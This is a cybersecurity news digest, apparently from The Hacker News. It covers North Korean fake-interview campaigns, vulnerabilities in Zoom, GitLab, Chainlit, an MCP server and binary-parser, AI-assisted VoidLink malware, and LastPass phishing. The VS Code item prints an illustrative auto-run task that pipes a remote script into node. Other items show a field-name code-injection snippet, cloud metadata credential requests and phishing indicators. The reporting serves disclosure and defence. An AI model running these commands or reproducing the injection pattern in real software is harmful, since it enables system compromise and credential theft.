2026-01-22 AI Startup News
North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings come from Recorded Future's Insikt Group, which is tracking the North Korean threat activity cluster under the moniker PurpleBravo. First documented in late 2023, the campaign is also known as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, and WaterPlum. The IP addresses, primarily concentrated in South Asia and North America, are assessed to have been targeted by the adversary from August 2024 to September 2025.
The 20 victim companies are said to be based in Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the United Arab Emirates (U.A.E.), and Vietnam. “In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target,” the threat intelligence firm said in a new report shared with The Hacker News. The disclosure comes a day after Jamf Threat Labs detailed a significant iteration of the Contagious Interview campaign wherein the attackers abuse malicious Microsoft Visual Studio Code (VS Code) projects as an attack vector to distribute a backdoor, underscoring continued exploitation of trusted developer workflows to achieve their twin goals of cyber espionage and financial theft. The Mastercard-owned company said it detected four LinkedIn personas potentially associated with PurpleBravo that masqueraded as developers and recruiters and claimed to be from the Ukrainian city of Odesa, along with several malicious GitHub repositories that are designed to deliver known malware families like BeaverTail.
PurpleBravo has also been observed managing two distinct sets of command-and-control (C2) servers for BeaverTail, a JavaScript infostealer and loader, and a Go-based backdoor known as GolangGhost (aka FlexibleFerret or WeaselStore) that is based on the HackBrowserData open-source tool. The C2 servers, hosted across 17 different providers, are administered via Astrill VPN and from IP ranges in China. North Korean threat actors' use of Astrill VPN in cyber attacks has been well-documented over the years. It's worth pointing out that Contagious Interview complements a second, separate campaign referred to as Wagemole (aka PurpleDelta), in which IT workers from the Hermit Kingdom seek unauthorized employment under fraudulent or stolen identities with organizations based in the U.S. and other parts of the world for both financial gain and espionage. While the two clusters are treated as disparate sets of activity, there are significant tactical and infrastructure overlaps between them, even though the IT worker threat has been ongoing since 2017. "This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity," Recorded Future said. To make matters worse, candidates approached by PurpleBravo with fictitious job offers have been found to take the coding assessment on company-issued devices, effectively compromising their employers in the process.
This highlights that the IT software supply chain is "just as vulnerable" to infiltration by North Korean adversaries beyond the IT workers themselves. "Many of these [potential victim] organizations advertise large customer bases, presenting an acute supply-chain risk to companies outsourcing work in these regions," the company noted. "While the North Korean IT worker employment threat has been widely publicized, the PurpleBravo supply-chain risk deserves equal attention so organizations can prepare, defend, and prevent sensitive data leakage to North Korean threat actors." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws
Zoom and GitLab have released security updates to resolve a number of vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability, tracked as CVE-2026-22844 and discovered internally by Zoom's Offensive Security team, carries a CVSS score of 9.9 out of 10.0. "A command injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access," the company noted in a Tuesday alert.
Zoom is recommending that customers using Zoom Node Meetings, Hybrid, or Meeting Connector deployments update to the latest available MMR version to safeguard against any potential threat. There is no evidence that the security flaw has been exploited in the wild. The vulnerability affects the following versions -

- Zoom Node Meetings Hybrid (ZMH) MMR module versions prior to 5.2.1716.0
- Zoom Node Meeting Connector (MC) MMR module versions prior to 5.2.1716.0

GitLab Releases Patches for Severe Flaws

The disclosure comes as GitLab released fixes for multiple high-severity flaws affecting its Community Edition (CE) and Enterprise Edition (EE) that could result in DoS and a bypass of two-factor authentication (2FA) protections. The shortcomings are listed below -

- CVE-2025-13927 (CVSS score: 7.5) - A vulnerability that could allow an unauthenticated user to create a DoS condition by sending crafted requests with malformed authentication data (Affects all versions from 11.9 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2)
- CVE-2025-13928 (CVSS score: 7.5) - An incorrect authorization vulnerability in the Releases API that could allow an unauthenticated user to cause a DoS condition (Affects all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2)
- CVE-2026-0723 (CVSS score: 7.4) - A vulnerability that could allow an individual with existing knowledge of a victim's credential ID to bypass 2FA by submitting forged device responses (Affects all versions from 18.6 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2)

Also remediated by GitLab are two other medium-severity bugs that could likewise trigger a DoS condition (CVE-2025-13335, CVSS score: 6.5, and CVE-2026-1102, CVSS score: 5.3) by configuring malformed Wiki documents that bypass cycle detection and by sending repeated malformed SSH authentication requests, respectively.
Webinar: How Smart MSSPs Use AI to Boost Margins with Half the Staff
Every managed security provider is chasing the same problem in 2026 — too many alerts, too few analysts, and clients demanding “CISO-level protection” at SMB budgets. The truth? Most MSSPs are running harder, not smarter. And it’s breaking their margins.
That's where the quiet revolution is happening: AI isn't just writing reports or surfacing risks — it's rebuilding how security services are delivered.

The Shift

Until now, MSSPs scaled by adding people. Each new client meant another analyst, another spreadsheet, another late-night ticket queue. AI automation flips that model.
It handles assessments, benchmarking, and reporting in minutes — freeing your team to focus on strategy, not data entry. Early adopters are already seeing double-digit margin gains and faster onboarding cycles — without increasing headcount.

Real Proof — Not Theory

When Chad Robinson, CISO at Secure Cyber Defense, applied Cynomi's AI platform, his team stopped drowning in manual checklists. He didn't just automate reports; he turned junior analysts into "virtual CISOs," expanding coverage and growing revenue from advisory services — all by standardizing delivery through AI.
Secure your spot for the live session ➜

What You'll Learn

In this session, Cynomi CEO David Primor and Chad Robinson unpack the real operating blueprint:

- How AI eliminates the grunt work that eats profit
- How to tier and package cybersecurity services for steady MRR
- What actually moved the needle for a growing MSSP — and how you can copy it
- How AI enables consistent, CISO-grade service at scale

If you're still hiring your way out of the workload crisis, you're already behind. The MSSPs winning 2026 aren't bigger — they're smarter. Join the live session to see how AI can scale your security business without scaling your payroll. Register for the Webinar ➜
This article is a contributed piece from one of our valued partners.
Exposure Assessment Platforms Signal a Shift in Focus
Gartner® doesn’t create new categories lightly. Generally speaking, a new acronym only emerges when the industry’s collective “to-do list” has become mathematically impossible to complete. And so it seems that the introduction of the Exposure Assessment Platforms (EAP) category is a formal admission that traditional Vulnerability Management (VM) is no longer a viable way to secure a modern enterprise. The shift from the traditional Market Guide for Vulnerability Assessment to the new Magic Quadrant for EAPs represents a move away from the “vulnerability hose”, i.e., the endless stream of CVEs, and toward a model of Continuous Threat Exposure Management (CTEM) .
To us, this is more than just a change in terminology; it is an attempt to solve the "Dead End" paradox that has plagued security teams for a decade. In the inaugural Magic Quadrant report of this category, Gartner evaluated 20 vendors on their ability to support continuous discovery, risk-informed prioritization, and integrated visibility across cloud, on-prem, and identity layers. In this article, we'll take a deep dive into the key findings of the report, the drivers behind the new category, the features that define it, and what we see as the takeaways for security teams.

Why Exposure Assessment Is Gaining Ground

Security tools have always promised risk reduction, but they've mostly delivered noise.
One product would reveal a misconfiguration. Another would log a privilege drift. A third would flag vulnerable external-facing assets. The result is a crisis of volume that has led to chronic alert fatigue in the SOC.
Each tool provided a piece of the puzzle, yet none were able to put all the pieces together and explain how exposure forms, or what to fix first to avoid it. The skepticism toward legacy VM tools is well-earned. Data from over 15,000 environments shows that 74% of identified exposures are "dead ends," existing on assets that have no viable path to a critical system. In the old model, a security team might spend 90% of its remediation effort fixing these dead ends, yielding effectively zero reduction in risk to business processes.
This is what EAPs are designed to address. They pull all those pieces into a unified view that tracks how systems, identities, and vulnerabilities interact in real environments, and shows how an attacker could actually use them to move from a low-risk dev environment to critical assets. This model is gaining traction because it reflects how attackers operate. Threat actors don't limit themselves to a single flaw. They chain weak controls, misaligned privileges, and blind spots in detection. The EAP model tracks how exposures accumulate across environments and lead attackers to reachable assets. Platforms in this category are built to show where risk originates, how it spreads, and which conditions support attacker movement. Gartner projects that organizations using this approach will reduce unplanned downtime by 30% by 2027.
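The "dead end" distinction can be made concrete with a toy reachability check over an attack graph. Everything below is invented for illustration (asset names, edges, and the function are not from the report); the point is simply that an exposure matters only if some path from it reaches a critical asset:

```javascript
// Toy attack graph: nodes are assets, a directed edge A -> B means an
// attacker on A can move to B (via a vuln, credential, or misconfiguration).
const edges = {
  "internet": ["web-server"],
  "web-server": ["app-server"],
  "app-server": ["crown-jewel-db"],
  "dev-laptop": ["build-server"], // exposed, but leads nowhere critical
  "build-server": [],
};

// An exposure is a "dead end" if no path from it reaches a critical asset.
function reachesCritical(start, critical) {
  const seen = new Set([start]);
  const queue = [start];
  while (queue.length) {
    const node = queue.shift();
    if (critical.has(node)) return true;
    for (const next of edges[node] ?? []) {
      if (!seen.has(next)) {
        seen.add(next);
        queue.push(next);
      }
    }
  }
  return false;
}

const critical = new Set(["crown-jewel-db"]);
console.log(reachesCritical("web-server", critical)); // true  -- prioritize
console.log(reachesCritical("dev-laptop", critical)); // false -- a "dead end"
```

In this simplified picture, patching the dev laptop first would consume effort without reducing risk to the crown-jewel database, which is the prioritization failure the EAP category claims to fix.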
That kind of dramatic outcome is based on an equally dramatic change in how exposure is defined, modeled, and operationalized across environments. The shift touches every layer of the security workflow - from how signals are connected to how teams decide what to fix first.

Drill Down: From Static Lists to Exposure in Motion

That shift in workflow begins with how EAPs detect and connect the conditions that lead to risk. Exposure assessment platforms take a different approach than traditional vulnerability tools.
They're built around a distinct set of capabilities:

- They consolidate discovery across environments. EAPs continuously scan internal networks, cloud workloads, and user-facing systems to identify both known and untracked assets, alongside unmanaged identities, misconfigured roles, and legacy systems that may not appear in standard inventories.
- They prioritize based on context, not just severity. Exposure is ranked using multiple parameters - asset importance, access paths, exploitability, and control coverage. This allows teams to see which issues are reachable, which are isolated, and which enable lateral movement.
- They integrate exposure data into operational workflows. EAP output is designed to support action. Platforms connect with IT and security tools so findings can be assigned, tracked, and resolved through existing systems - without waiting for a quarterly audit or manual review.
- They support lifecycle tracking. Once exposures are identified, EAPs monitor them across remediation steps, configuration changes, and policy updates. That visibility helps teams understand what's been fixed, what remains, and how each adjustment affects risk posture.

What the Quadrant Reveals About Market Maturity

The new Magic Quadrant highlights a split in the market.
On one side, you have legacy incumbents attempting to “bolt on” exposure features to their existing scanning engines. On the other, you have native Exposure Management players who have been modeling attacker behavior for years. The maturity of the category is evidenced by a shift in the “definition of done.” Success is no longer measured by how many vulnerabilities were patched, but by how many critical attack paths were eliminated. Platforms like XM Cyber, which were built on attack graph-based modeling, are now leading the way for this approach.
What Security Teams Should Be Watching

Exposure assessment now stands as its own category, with defined capabilities, evaluation criteria, and a growing role in enterprise workflows. The platforms in the Magic Quadrant are identifying connected exposures, mapping which assets can be reached, and guiding remediation based on attacker movement. For the practitioner, the immediate value is efficiency. These platforms are making decisions about what to fix first, how to assign ownership, and where risk reduction will have the most impact.
Exposure assessment is now positioned as a core layer in how environments are secured, maintained, and understood. If you can mathematically prove that 74% of your alerts can be safely ignored, you aren't just "improving security" – you're returning time and resources to a team that is likely already at its breaking point. The EAP category is finally aligning security metrics with business reality. The question is no longer "How many vulnerabilities do we have?" but "Are we safe from the attack paths that matter?" To learn more about why XM Cyber was named a Challenger in the 2025 Magic Quadrant for Exposure Assessment Platforms, grab your copy of the report here.
Note : This article was expertly written and contributed by Maya Malevich, Head of Product Marketing at XM Cyber. Gartner Disclaimer: Gartner, Magic Quadrant for Exposure Assessment Platforms, By Mitchell Schneider, Dhivya Poole, and Jonathan Nunez, November 10, 2025. GARTNER is a registered trademark and service mark of Gartner, and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S.
and internationally, and are used herein with permission. All rights reserved. Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact.
Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This article is a contributed piece from one of our valued partners.
Chainlit AI Framework Flaws Enable Data Theft via File Read and SSRF Bugs
Security vulnerabilities have been uncovered in the popular open-source artificial intelligence (AI) framework Chainlit that could allow attackers to steal sensitive data and potentially move laterally within a susceptible organization. Zafran Security said the high-severity flaws, collectively dubbed ChainLeak, could be abused to leak cloud environment API keys, steal sensitive files, or perform server-side request forgery (SSRF) attacks against servers hosting AI applications. Chainlit is a framework for creating conversational chatbots. According to statistics shared by the Python Software Foundation, the package has been downloaded over 220,000 times over the past week.
It has attracted a total of 7.3 million downloads to date. Details of the two vulnerabilities are as follows -

- CVE-2026-22218 (CVSS score: 7.1) - An arbitrary file read vulnerability in the "/project/element" update flow that allows an authenticated attacker to read the contents of any file readable by the service into their own session due to a lack of validation of user-controlled fields
- CVE-2026-22219 (CVSS score: 8.3) - An SSRF vulnerability in the "/project/element" update flow, when configured with the SQLAlchemy data layer backend, that allows an attacker to make arbitrary HTTP requests to internal network services or cloud metadata endpoints from the Chainlit server and store the retrieved responses

"The two Chainlit vulnerabilities can be combined in multiple ways to leak sensitive data, escalate privileges, and move laterally within the system," Zafran researchers Gal Zaban and Ido Shani said. "Once an attacker gains arbitrary file read access on the server, the AI application's security quickly begins to collapse. What initially appears to be a contained flaw becomes direct access to the system's most sensitive secrets and internal state." For instance, an attacker can weaponize CVE-2026-22218 to read "/proc/self/environ," allowing them to glean valuable information such as API keys, credentials, and internal file paths that could be used to burrow deeper into the compromised network and even gain access to the application source code.
Alternatively, it can be used to leak database files if the setup uses SQLAlchemy with an SQLite backend as its data layer. What’s more, if Chainlit is deployed on an Amazon Web Services (AWS) EC2 instance with IMDSv1 enabled, the SSRF vulnerability can be abused to access the link-local address (169.254.169[.]254) and retrieve role endpoints, enabling opportunities for lateral movement within the cloud environment. Following responsible disclosure on November 23, 2025, both vulnerabilities were addressed by Chainlit in version 2.9.4 released on December 24, 2025. “As organizations rapidly adopt AI frameworks and third-party components, long-standing classes of software vulnerabilities are being embedded directly into AI infrastructure,” Zafran said.
"These frameworks introduce new and often poorly understood attack surfaces, where well-known vulnerability classes can directly compromise AI-powered systems."

Flaw in Microsoft MarkItDown MCP Server

The disclosure comes as BlueRock disclosed a similar SSRF vulnerability in Microsoft's MarkItDown Model Context Protocol (MCP) server, dubbed MCP fURI, that enables arbitrary calling of URI resources, exposing organizations to privilege escalation, SSRF, and data leakage attacks. The shortcoming affects the server when running on an Amazon Web Services (AWS) EC2 instance using IMDSv1. "This vulnerability allows an attacker to execute the Markitdown MCP tool convert_to_markdown to call an arbitrary uniform resource identifier (URI)," BlueRock said. "The lack of any boundaries on the URI allows any user, agent, or attacker calling the tool to access any HTTP or file resource." "When providing a URI to the Markitdown MCP server, this can be used to query the instance metadata of the server.
A user can then obtain credentials to the instance if there is a role associated, giving you access to the AWS account, including the access and secret keys." The agentic AI security company said its analysis of more than 7,000 MCP servers found that 36.7% of them are likely exposed to similar SSRF vulnerabilities. To mitigate the risk posed by the issue, it's advised to use IMDSv2 to secure against SSRF attacks, implement private IP blocking, restrict access to metadata services, and create an allowlist to prevent data exfiltration.
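The reason IMDSv2 blunts this class of SSRF is structural: IMDSv1 answers a bare unauthenticated GET, while IMDSv2 requires the client to first mint a session token with a PUT request carrying a custom header, then echo that token on every metadata read - something a GET-only SSRF primitive cannot do. A minimal sketch of the two request shapes (the paths and headers are the documented IMDS endpoints; nothing here is sent over the network):

```javascript
// IMDSv1: a single unauthenticated GET. Any SSRF primitive that can make a
// GET to an attacker-chosen URL can read instance credentials this way.
const imdsV1Request = {
  method: "GET",
  url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
};

// IMDSv2 step 1: a PUT with a TTL header mints a short-lived session token.
const imdsV2TokenRequest = {
  method: "PUT",
  url: "http://169.254.169.254/latest/api/token",
  headers: { "X-aws-ec2-metadata-token-ttl-seconds": "21600" },
};

// IMDSv2 step 2: the token must accompany every metadata GET. A GET-only
// SSRF bug like the ones described above cannot complete step 1 at all.
const imdsV2MetadataRequest = (token) => ({
  method: "GET",
  url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
  headers: { "X-aws-ec2-metadata-token": token },
});
```

The PUT-plus-header handshake is precisely why "enforce IMDSv2" appears in the mitigation guidance: it turns a one-request credential leak into a two-step exchange most SSRF bugs cannot perform.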
Most AI Risk Isn’t in Models, It’s in Your SaaS Stack
VoidLink Linux Malware Framework Built with AI Assistance Reaches 88,000 Lines of Code
The recently discovered sophisticated Linux malware framework known as VoidLink is assessed to have been developed by a single person with assistance from an artificial intelligence (AI) model. That's according to new findings from Check Point Research, which identified operational security blunders by the malware's author that provided clues to its developmental origins. The latest insight makes VoidLink one of the first instances of advanced malware largely generated using AI. "These materials provide clear evidence that the malware was produced predominantly through AI-driven development, reaching a first functional implant in under a week," the cybersecurity company said, adding that the codebase reached more than 88,000 lines of code by early December 2025.
VoidLink, first publicly documented last week, is a feature-rich malware framework written in Zig that’s specifically designed for long-term, stealthy access to Linux-based cloud environments. The malware is said to have come from a Chinese-affiliated development environment. As of writing, the exact purpose of the malware remains unclear. No real-world infections have been observed to date.
A follow-up analysis from Sysdig was the first to highlight that the toolkit may have been developed with the help of a large language model (LLM) under the direction of a human with extensive kernel development knowledge and red team experience, citing four different pieces of evidence -

- Overly systematic debug output with perfectly consistent formatting across all modules
- Placeholder data ("John Doe") typical of LLM training examples embedded in decoy response templates
- Uniform API versioning where everything is _v3 (e.g., BeaconAPI_v3, docker_escape_v3, timestomp_v3)
- Template-like JSON responses covering every possible field

"The most likely scenario: a skilled Chinese-speaking developer used AI to accelerate development (generating boilerplate, debug logging, JSON templates) while providing the security expertise and architecture themselves," the cloud security vendor noted late last week. Check Point's Tuesday report backs up this hypothesis, stating it identified artifacts suggesting that the development itself was engineered using an AI model, which was then used to build, execute, and test the framework - effectively turning a concept into a working tool within an accelerated timeline.

High-level overview of the VoidLink Project

"The general approach to developing VoidLink can be described as Spec Driven Development (SDD)," it noted. "In this workflow, a developer begins by specifying what they're building, then creates a plan, breaks that plan into tasks, and only then allows an agent to implement it." It's believed that the threat actor commenced work on VoidLink in late November 2025, leveraging a coding agent known as TRAE SOLO to carry out the tasks.
This assessment is based on the presence of TRAE-generated helper files that have been copied along with the source code to the threat actor’s server and later leaked in an exposed open directory. In addition, Check Point said it uncovered internal planning material written in Chinese related to sprint schedules, feature breakdowns, and coding guidelines that have all the hallmarks of LLM-generated content – well-structured, consistently formatted, and meticulously detailed. One such document detailing the development plan was created on November 27, 2025. The documentation is said to have been repurposed as an execution blueprint for the LLM to follow, build, and test the malware.
Check Point, which replicated the implementation workflow using the TRAE IDE used by the developer, found that the model generated code that resembled VoidLink's source code.

Translated development plan for three teams: Core, Arsenal, and Backend

"A review of the code standardization instructions against the recovered VoidLink source code shows a striking level of alignment," it said. "Conventions, structure, and implementation patterns match so closely that it leaves little room for doubt: the codebase was written to those exact instructions." The development is yet another sign that, while AI and LLMs may not equip bad actors with novel capabilities, they can further lower the barrier to entry for cybercrime, empowering even a single individual to envision, create, and iterate on complex systems quickly and pull off sophisticated attacks - streamlining a process that once required significant effort and resources and was available only to nation-state adversaries. "VoidLink represents a real shift in how advanced malware can be created.
What stood out wasn’t just the sophistication of the framework, but the speed at which it was built,” Eli Smadja, group manager at Check Point Research, said in a statement shared with The Hacker News. “AI enabled what appears to be a single actor to plan, develop, and iterate a complex malware platform in days – something that previously required coordinated teams and significant resources. This is a clear signal that AI is changing the economics and scale of cyber threats.” In a whitepaper published this week, Group-IB described AI as supercharging a “fifth wave” in the evolution of cybercrime, offering ready-made tools to enable sophisticated attacks. “Adversaries are industrialising AI, turning once specialist skills such as persuasion, impersonation, and malware development into on-demand services available to anyone with a credit card,” it said.
The Singapore-headquartered cybersecurity company noted that dark web forum posts featuring AI keywords have seen a 371% increase since 2019, with threat actors advertising dark LLMs like Nytheon AI that do not have any ethical restrictions, jailbreak frameworks, and synthetic identity kits offering AI video actors, cloned voices, and even biometric datasets for as little as $5. "AI has industrialized cybercrime. What once required skilled operators and time can now be bought, automated, and scaled globally," Craig Jones, former INTERPOL director of cybercrime and independent strategic advisor, said. "While AI hasn't created new motives for cybercriminals — money, leverage, and access still drive the ecosystem — it has dramatically increased the speed, scale, and sophistication with which those motives are pursued."
LastPass Warns of Fake Maintenance Messages Targeting Users’ Master Passwords
LastPass is alerting users to an active phishing campaign impersonating the password management service that aims to trick users into giving up their master passwords. The campaign, which began on or around January 19, 2026, involves sending phishing emails claiming upcoming maintenance and urging recipients to create a local backup of their password vaults within the next 24 hours. The messages, LastPass said, come with the following subject lines -

- LastPass Infrastructure Update: Secure Your Vault Now
- Your Data, Your Protection: Create a Backup Before Maintenance
- Don't Miss Out: Backup Your Vault Before Maintenance
- Important: LastPass Maintenance & Your Vault Security
- Protect Your Passwords: Backup Your Vault (24-Hour Window)

The emails are designed to steer unsuspecting users to a phishing site ("group-content-gen2.s3.eu-west-3.amazonaws[.]com/5yaVgx51ZzGf") that then redirects to the domain "mail-lastpass[.]com." The company emphasized that it will never ask users for their master passwords and that it's working with third-party partners to take the malicious infrastructure down. It has also shared the email addresses from which the messages originate -

- support@sr22vegas[.]com
- support@lastpass[.]server8
- support@lastpass[.]server7
- support@lastpass[.]server3

"This campaign is designed to create a false sense of urgency, which is one of the most common and effective tactics we see in phishing attacks," a spokesperson for the Threat Intelligence, Mitigation, and Escalation (TIME) team at LastPass told The Hacker News in a statement.
"We want customers and the broader security community to be aware that LastPass will never ask for their master password or demand immediate action under a tight deadline. We thank our customers for staying vigilant and continuing to report suspicious activity." The development comes months after LastPass cautioned users of an information-stealing campaign targeting Apple macOS users through fake GitHub repositories that distribute malware-laced programs masquerading as the password manager and other popular software.
CERT/CC Warns binary-parser Bug Allows Node.js Privilege-Level Code Execution
A security vulnerability has been disclosed in the popular binary-parser npm library that, if successfully exploited, could result in the execution of arbitrary JavaScript. The vulnerability, tracked as CVE-2026-1245 (CVSS score: N/A), affects all versions of the module prior to version 2.3.0, which addresses the issue. Patches for the flaw were released on November 26, 2025. Binary-parser is a widely used parser builder for JavaScript that allows developers to parse binary data.
It supports a wide range of common data types, including integers, floating-point values, strings, and arrays. The package attracts approximately 13,000 downloads on a weekly basis. According to an advisory released by the CERT Coordination Center (CERT/CC), the vulnerability has to do with a lack of sanitization of user-supplied values, such as parser field names and encoding parameters, when the JavaScript parser code is dynamically generated at runtime using the “Function” constructor. It’s worth noting that the npm library builds JavaScript source code as a string that represents the parsing logic and compiles it using the Function constructor and caches it as an executable function to parse buffers efficiently.
However, as a result of CVE-2026-1245, attacker-controlled input can make its way into the generated code without adequate validation, meaning an application that builds parser definitions from untrusted data can be coerced into executing arbitrary code. Applications that use only static, hard-coded parser definitions are not affected by the flaw. “In affected applications that construct parser definitions using untrusted input, an attacker may be able to execute arbitrary JavaScript code with the privileges of the Node.js process,” CERT/CC said. “This could allow access to local data, manipulation of application logic, or execution of system commands depending on the deployment environment.” Security researcher Maor Caplan has been credited with discovering and reporting the vulnerability.
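To illustrate the class of bug, the sketch below reproduces the general code-generation pattern CERT/CC describes — it is a hypothetical example, not binary-parser's actual source, and `compileParser` and the field names are invented for the illustration:

```typescript
// Hypothetical sketch: parser source is assembled as a string and compiled
// with the Function constructor, mirroring the pattern the advisory describes.
function compileParser(fieldName: string): (buf: Uint8Array) => unknown {
  // The field name is interpolated into generated source without sanitization.
  const src = `return { ${fieldName}: buffer[0] };`;
  return new Function("buffer", src) as (buf: Uint8Array) => unknown;
}

// Static, hard-coded field names are safe - this mirrors unaffected apps.
const safe = compileParser("version");
console.log(safe(new Uint8Array([42]))); // a { version: 42 } object

// An attacker-controlled "field name" smuggles an arbitrary expression into
// the generated code via a computed property, which runs at parse time.
const hostile = '[(globalThis.pwned = true, "x")]';
const unsafe = compileParser(hostile);
unsafe(new Uint8Array([0]));
console.log((globalThis as any).pwned); // the injected expression has run
```

This is why the fixed version validates field names and encoding parameters, and why the advisory stresses that only applications constructing parser definitions from untrusted input are exposed.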
Users of binary-parser are advised to upgrade to version 2.3.0 and avoid passing user-controlled values into parser field names or encoding parameters.
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. The latest finding demonstrates continued evolution of the new tactic that was first discovered in December 2025, Jamf Threat Labs said. “This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News. First disclosed by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
The end goal of these efforts is to abuse VS Code task configuration files to execute malicious payloads staged on Vercel domains, with the payload chosen based on the operating system of the infected host. The task is configured with the “runOn”: “folderOpen” option so that it executes automatically every time the project folder is opened in VS Code. This ultimately leads to the deployment of BeaverTail and InvisibleFerret.

Contagious Interview Using VS Code Tasks (figure)

Subsequent iterations of the campaign have been found to conceal sophisticated multi-stage droppers in the task configuration files, disguising the malware as harmless spell-check dictionaries that serve as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain.
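For reference, the auto-run behavior described above relies on VS Code's standard tasks schema. A defanged illustration of what such a tasks.json could look like follows — the label, command, and domain are placeholders, not the campaign's actual indicators:

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Prepare environment",
      "type": "shell",
      "command": "curl -s https://payload.example.app/index.js | node",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
```

The "runOn": "folderOpen" option is a documented VS Code feature intended for benign setup tasks; it only fires after the user grants Workspace Trust, which is why the lure depends on the target opening and trusting the project.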
Like before, the obfuscated JavaScript embedded within these files is executed as soon as the victim opens the project in the integrated development environment (IDE). It establishes communication with a remote server (“ip-regions-check.vercel[.]app”) and executes any JavaScript code received from it. The final stage delivered as part of the attack is another heavily obfuscated JavaScript payload. Jamf said it discovered yet another change in this campaign, with the threat actors using a previously undocumented infection method to deliver a backdoor that offers remote code execution capabilities on the compromised host.
The starting point of the attack chain is no different in that it’s activated when the victim clones and opens a malicious Git repository using VS Code. “When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire explained. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”

Using a seemingly harmless dictionary file as a backup option (Source: OpenSourceMalware)

“On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime. This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.” The JavaScript payload, hosted on Vercel, contains the main backdoor logic: a persistent execution loop that harvests basic host information and communicates with a remote server to facilitate remote code execution, system fingerprinting, and continuous communication.
In one case, the Apple device management firm said it observed additional JavaScript instructions being executed roughly eight minutes after the initial infection. The newly downloaded JavaScript is designed to beacon to the server every five seconds, run additional JavaScript, and erase traces of its activity upon receiving a signal from the operator. It’s suspected that the script may have been generated using an artificial intelligence (AI) tool, owing to the presence of inline comments and phrasing in the source code. Threat actors with ties to the Democratic People’s Republic of Korea (DPRK) are known to specifically go after software engineers, particularly those working in the cryptocurrency, blockchain, and fintech sectors, as they often have privileged access to financial assets, digital wallets, and technical infrastructure.
Compromising their accounts and systems could give the attackers unauthorized access to source code, intellectual property, and internal systems, and allow them to siphon digital assets. These consistent changes in tactics are seen as an effort to achieve more success in the cyber espionage and financially motivated operations that support the heavily sanctioned regime. The development comes as Red Asgard detailed its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named Tsunami (aka TsunamiKit) along with an XMRig cryptocurrency miner. Another analysis from Security Alliance last week also laid out the campaign’s abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
Interestingly, the attack chain is engineered to fall back to two other methods: installing a malicious npm dependency named “grayavatar,” or running JavaScript code that retrieves a sophisticated Node.js controller, which, in turn, runs five distinct modules to log keystrokes, take screenshots, scan the system’s home directory for sensitive files, substitute wallet addresses copied to the clipboard, harvest credentials from web browsers, and establish a persistent connection to a remote server. The malware then proceeds to set up a parallel Python environment using a stager script that enables data collection, cryptocurrency mining using XMRig, keylogging, and the deployment of AnyDesk for remote access. It’s worth noting that the Node.js and Python layers are referred to as BeaverTail and InvisibleFerret, respectively. These findings indicate that the state-sponsored actors are experimenting with multiple delivery methods in tandem to increase the likelihood of success of their attacks.
“While monitoring, we’ve seen the malware that is being delivered change very quickly over a short amount of time,” Jaron Bradley, director of Jamf Threat Labs, told The Hacker News. “It’s worth noting that the payload we observed for macOS was written purely in JavaScript and had many signs of being AI-assisted. It’s difficult to know exactly how quickly attackers are changing their workflows, but this particular threat actor has a reputation for adapting quickly.” To counter the threat, developers are advised to exercise caution when interacting with third-party repositories, particularly those originating from unfamiliar sources or shared directly during coding tests; review source code contents before opening them in VS Code; and install only vetted npm packages. “This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said.
“The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools.”
